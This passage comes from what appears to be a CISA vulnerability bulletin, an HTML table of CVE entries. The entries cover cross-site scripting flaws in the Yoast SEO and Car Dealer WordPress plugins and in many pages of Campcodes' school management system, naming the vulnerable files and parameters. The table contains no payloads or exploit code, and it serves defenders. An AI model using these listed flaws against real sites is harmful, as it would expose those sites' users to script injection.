target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>yoast--Yoast SEO<br> </td>
<td>The Yoast SEO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'display_name' author meta in all versions up to, and including, 22.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4984&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4984" target="_blank">CVE-2024-4984</a><br><a href="https://developer.yoast.com/changelog/yoast-seo/22.7/" target="_blank">security@wordfence.com</a><br><a href="https://github.com/Yoast/wordpress-seo/pull/21334" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/changeset/3079234/wordpress-seo/trunk/src/presenters/slack/enhanced-data-presenter.php" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/59bcd246-ca2f-4336-9a6e-89afe873ed25?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
</tbody>
</table>
<p><a href="https://www.cisa.gov/#top">Back to top</a></p>
</div>
<div>
<h2>Low Vulnerabilities</h2>
<table summary="Low Vulnerabilities" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th scope="col" role="columnheader" data-tablesaw-priority="persist">Primary<br>Vendor -- Product</th>
<th scope="col" role="columnheader">Description</th>
<th scope="col" role="columnheader">Published</th>
<th scope="col" role="columnheader">CVSS Score</th>
<th scope="col" role="columnheader">Source &amp; Patch Info</th>
</tr>
</thead>
<tbody>
<tr>
<td>Bill Minozzi--Car Dealer<br> </td>
<td>Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS vulnerability in Bill Minozzi Car Dealer allows Code Injection.This issue affects Car Dealer: from n/a through 4.15.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4214&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">2.7</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4214" target="_blank">CVE-2024-4214</a><br><a href="https://patchstack.com/database/vulnerability/cardealer/wordpress-cardealer-plugin-4-15-content-injection-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Campcodes--Complete Web-Based School Management System<br> </td>
<td>A vulnerability classified as problematic was found in Campcodes Complete Web-Based School Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /view/show_student_subject.php. The manipulation of the argument id leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-263593 was assigned to this vulnerability.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4672&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">3.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4672" target="_blank">CVE-2024-4672</a><br><a href="https://github.com/E1CHO/cve_hub/blob/main/Complete%20Web-Based%20School%20Management%20System%20-%20xss/Complete%20Web-Based%20School%20Management%20System%20-%20vuln%2022.pdf" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.263593" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.263593" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.331307" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Campcodes--Complete Web-Based School Management System<br> </td>
<td>A vulnerability, which was classified as problematic, has been found in Campcodes Complete Web-Based School Management System 1.0. Affected by this issue is some unknown functionality of the file /view/show_student_grade_subject.php. The manipulation of the argument id leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-263594 is the identifier assigned to this vulnerability.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4673&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">3.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4673" target="_blank">CVE-2024-4673</a><br><a href="https://github.com/E1CHO/cve_hub/blob/main/Complete%20Web-Based%20School%20Management%20System%20-%20xss/Complete%20Web-Based%20School%20Management%20System%20-%20vuln%2023.pdf" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.263594" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.263594" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.331308" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Campcodes--Complete Web-Based School Management System<br> </td>
<td>A vulnerability, which was classified as problematic, was found in Campcodes Complete Web-Based School Management System 1.0. This affects an unknown part of the file /view/show_friend_request.php. The manipulation of the argument my_index leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-263595.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4674&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">3.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4674" target="_blank">CVE-2024-4674</a><br><a href="https://github.com/E1CHO/cve_hub/blob/main/Complete%20Web-Based%20School%20Management%20System%20-%20xss/Complete%20Web-Based%20School%20Management%20System%20-%20vuln%2024.pdf" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.263595" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.263595" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.331310" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Campcodes--Complete Web-Based School Management System<br> </td>
<td>A vulnerability has been found in Campcodes Complete Web-Based School Management System 1.0 and classified as problematic. This vulnerability affects unknown code of the file /view/show_events.php. The manipulation of the argument event_id leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-263596.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4675&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">3.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4675" target="_blank">CVE-2024-4675</a><br><a href="https://github.com/E1CHO/cve_hub/blob/main/Complete%20Web-Based%20School%20Management%20System%20-%20xss/Complete%20Web-Based%20School%20Management%20System%20-%20vuln%2025.pdf" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.263596" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.263596" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.331312" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Campcodes--Complete Web-Based School Management System<br> </td>
<td>A vulnerability was found in Campcodes Complete Web-Based School Management System 1.0 and classified as problematic. This issue affects some unknown processing of the file /view/range_grade_text.php. The manipulation of the argument count leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-263597 was assigned to this vulnerability.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4676&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">3.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4676" target="_blank">CVE-2024-4676</a><br><a href="https://github.com/E1CHO/cve_hub/blob/main/Complete%20Web-Based%20School%20Management%20System%20-%20xss/Complete%20Web-Based%20School%20Management%20System%20-%20vuln%2026.pdf" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.263597" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.263597" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.331313" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Campcodes--Complete Web-Based School Management System<br> </td>
<td>A vulnerability was found in Campcodes Complete Web-Based School Management System 1.0. It has been classified as problematic. Affected is an unknown function of the file /view/my_student_exam_marks1.php. The manipulation of the argument year leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-263598 is the identifier assigned to this vulnerability.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4677&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">3.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4677" target="_blank">CVE-2024-4677</a><br><a href="https://github.com/E1CHO/cve_hub/blob/main/Complete%20Web-Based%20School%20Management%20System%20-%20xss/Complete%20Web-Based%20School%20Management%20System%20-%20vuln%2027.pdf" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.263598" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.263598" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.331314" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Campcodes--Complete Web-Based School Management System<br> </td>
<td>A vulnerability was found in Campcodes Complete Web-Based School Management System 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /view/find_friends.php. The manipulation of the argument my_type leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-263599.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4678&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">3.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4678" target="_blank">CVE-2024-4678</a><br><a href="https://github.com/E1CHO/cve_hub/blob/main/Complete%20Web-Based%20School%20Management%20System%20-%20xss/Complete%20Web-Based%20School%20Management%20System%20-%20vuln%2028.pdf" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.263599" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.263599" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.331315" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Campcodes--Complete Web-Based School Management System<br> </td>
<td>A vulnerability has been found in Campcodes Complete Web-Based School Management System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /view/exam_timetable_update_form.php. The manipulation of the argument exam leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-263623.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4682&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">3.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4682" target="_blank">CVE-2024-4682</a><br><a href="https://github.com/E1CHO/cve_hub/blob/main/Complete%20Web-Based%20School%20Management%20System%20-%20xss/Complete%20Web-Based%20School%20Management%20System%20-%20vuln%2029.pdf" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.263623" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.263623" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.331772" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Campcodes--Complete Web-Based School Management System<br> </td>
<td>A vulnerability was found in Campcodes Complete Web-Based School Management System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /view/exam_timetable_insert_form.php. The manipulation of the argument exam leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-263624.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4683&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">3.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4683" target="_blank">CVE-2024-4683</a><br><a href="https://github.com/E1CHO/cve_hub/blob/main/Complete%20Web-Based%20School%20Management%20System%20-%20xss/Complete%20Web-Based%20School%20Management%20System%20-%20vuln%2030.pdf" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.263624" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.263624" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.331773" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Campcodes--Complete Web-Based School Management System<br> </td>
<td>A vulnerability was found in Campcodes Complete Web-Based School Management System 1.0. It has been classified as problematic. This affects an unknown part of the file /view/exam_timetable_grade_wise.php. The manipulation of the argument exam leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-263625 was assigned to this vulnerability.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4684&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">3.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4684" target="_blank">CVE-2024-4684</a><br><a href="https://github.com/E1CHO/cve_hub/blob/main/Complete%20Web-Based%20School%20Management%20System%20-%20xss/Complete%20Web-Based%20School%20Management%20System%20-%20vuln%2031.pdf" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.263625" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.263625" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.331774" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Campcodes--Complete Web-Based School Management System<br> </td>
<td>A vulnerability was found in Campcodes Complete Web-Based School Management System 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /view/exam_timetable.php. The manipulation of the argument exam leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-263626 is the identifier assigned to this vulnerability.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4685&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">3.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4685" target="_blank">CVE-2024-4685</a><br><a href="https://github.com/E1CHO/cve_hub/blob/main/Complete%20Web-Based%20School%20Management%20System%20-%20xss/Complete%20Web-Based%20School%20Management%20System%20-%20vuln%2032.pdf" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.263626" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.263626" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.331775" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Campcodes--Complete Web-Based School Management System<br> </td>
<td>A vulnerability was found in Campcodes Complete Web-Based School Management System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /view/emarks_range_grade_update_form.php. The manipulation of the argument grade leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-263627.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4686&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">3.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4686" target="_blank">CVE-2024-4686</a><br><a href="https://github.com/E1CHO/cve_hub/blob/main/Complete%20Web-Based%20School%20Management%20System%20-%20xss/Complete%20Web-Based%20School%20Management%20System%20-%20vuln%2033.pdf" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.263627" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.263627" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.331776" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Campcodes--Complete Web-Based School Management System<br> </td>
<td>A vulnerability classified as problematic has been found in Campcodes Complete Web-Based School Management System 1.0. Affected is an unknown function of the file /view/create_events.php. The manipulation of the argument my_index leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-263628.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4687&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">3.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4687" target="_blank">CVE-2024-4687</a><br><a href="https://github.com/E1CHO/cve_hub/blob/main/Complete%20Web-Based%20School%20Management%20System%20-%20xss/Complete%20Web-Based%20School%20Management%20System%20-%20vuln%2034.pdf" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.263628" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.263628" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.331777" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Campcodes--Complete Web-Based School Management System<br> </td>
<td>A vulnerability classified as problematic was found in Campcodes Complete Web-Based School Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /view/conversation_history_admin.php. The manipulation of the argument conversation_id leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-263629 was assigned to this vulnerability.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4688&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">3.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4688" target="_blank">CVE-2024-4688</a><br><a href="https://github.com/E1CHO/cve_hub/blob/main/Complete%20Web-Based%20School%20Management%20System%20-%20xss/Complete%20Web-Based%20School%20Management%20System%20-%20vuln%2035.pdf" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.263629" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.263629" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.331778" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Campcodes--Complete Web-Based School Management System<br> </td>
<td>A vulnerability classified as problematic was found in Campcodes Complete Web-Based School Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /view/all_teacher.php. The manipulation of the argument page leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-263791.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4713&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">3.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4713" target="_blank">CVE-2024-4713</a><br><a href="https://github.com/E1CHO/cve_hub/blob/main/Complete%20Web-Based%20School%20Management%20System%20-%20xss/Complete%20Web-Based%20School%20Management%20System%20-%20vuln%2036.pdf" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.263791" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.263791" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.331879" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Campcodes--Complete Web-Based School Management System<br> </td>
<td>A vulnerability, which was classified as problematic, has been found in Campcodes Complete Web-Based School Management System 1.0. Affected by this issue is some unknown functionality of the file /model/update_subject.php. The manipulation of the argument name leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-263792.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4714&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">3.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4714" target="_blank">CVE-2024-4714</a><br><a href="https://github.com/E1CHO/cve_hub/blob/main/Complete%20Web-Based%20School%20Management%20System%20-%20xss/Complete%20Web-Based%20School%20Management%20System%20-%20vuln%2037.pdf" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.263792" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.263792" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.331880" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Campcodes--Complete Web-Based School Management System<br> </td>
<td>A vulnerability, which was classified as problematic, was found in Campcodes Complete Web-Based School Management System 1.0. This affects an unknown part of the file /model/update_grade.php. The manipulation of the argument name leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-263793 was assigned to this vulnerability.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4715&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">3.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4715" target="_blank">CVE-2024-4715</a><br><a href="https://github.com/E1CHO/cve_hub/blob/main/Complete%20Web-Based%20School%20Management%20System%20-%20xss/Complete%20Web-Based%20School%20Management%20System%20-%20vuln%2038.pdf" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.263793" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.263793" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.331881" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Campcodes--Complete Web-Based School Management System<br> </td>
<td>A vulnerability has been found in Campcodes Complete Web-Based School Management System 1.0 and classified as problematic. This vulnerability affects unknown code of the file /model/update_exam.php. The manipulation of the argument name leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-263794 is the identifier assigned to this vulnerability.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4716&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">3.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4716" target="_blank">CVE-2024-4716</a><br><a href="https://github.com/E1CHO/cve_hub/blob/main/Complete%20Web-Based%20School%20Management%20System%20-%20xss/Complete%20Web-Based%20School%20Management%20System%20-%20vuln%2039.pdf" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.263794" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.263794" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.331882" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Campcodes--Complete Web-Based School Management System<br> </td>
<td>A vulnerability was found in Campcodes Complete Web-Based School Management System 1.0 and classified as problematic. This issue affects some unknown processing of the file /model/update_classroom.php. The manipulation of the argument name leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-263795.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4717&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">3.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4717" target="_blank">CVE-2024-4717</a><br><a href="https://github.com/E1CHO/cve_hub/blob/main/Complete%20Web-Based%20School%20Management%20System%20-%20xss/Complete%20Web-Based%20School%20Management%20System%20-%20vuln%2040.pdf" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.263795" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.263795" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.331883" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Campcodes--Complete Web-Based School Management System<br> </td>
<td>A vulnerability was found in Campcodes Complete Web-Based School Management System 1.0. It has been classified as problematic. Affected is an unknown function of the file /model/delete_student_grade_subject.php. The manipulation of the argument index leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-263796.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4718&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">3.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4718" target="_blank">CVE-2024-4718</a><br><a href="https://github.com/E1CHO/cve_hub/blob/main/Complete%20Web-Based%20School%20Management%20System%20-%20xss/Complete%20Web-Based%20School%20Management%20System%20-%20vuln%2041.pdf" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.263796" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.263796" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.331884" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Campcodes--Complete Web-Based School Management System<br> </td>
<td>A vulnerability was found in Campcodes Complete Web-Based School Management System 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /model/delete_record.php. The manipulation of the argument page leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-263797 was assigned to this vulnerability.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4719&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">3.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4719" target="_blank">CVE-2024-4719</a><br><a href="https://github.com/E1CHO/cve_hub/blob/main/Complete%20Web-Based%20School%20Management%20System%20-%20xss/Complete%20Web-Based%20School%20Management%20System%20-%20vuln%2042.pdf" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.263797" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.263797" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.331885" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Campcodes--Complete Web-Based School Management System<br> </td>
<td>A vulnerability was found in Campcodes Complete Web-Based School Management System 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /model/approve_petty_cash.php. The manipulation of the argument admin_index leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-263798 is the identifier assigned to this vulnerability.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4720&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">3.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4720" target="_blank">CVE-2024-4720</a><br><a href="https://github.com/E1CHO/cve_hub/blob/main/Complete%20Web-Based%20School%20Management%20System%20-%20xss/Complete%20Web-Based%20School%20Management%20System%20-%20vuln%2043.pdf" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.263798" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.263798" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.331886" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Campcodes--Complete Web-Based School Management System<br> </td>
<td>A vulnerability classified as problematic has been found in Campcodes Complete Web-Based School Management System 1.0. This affects an unknown part of the file /model/add_student_subject.php. The manipulation of the argument index leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-263799.</td>
<td>2024-05-14</td>
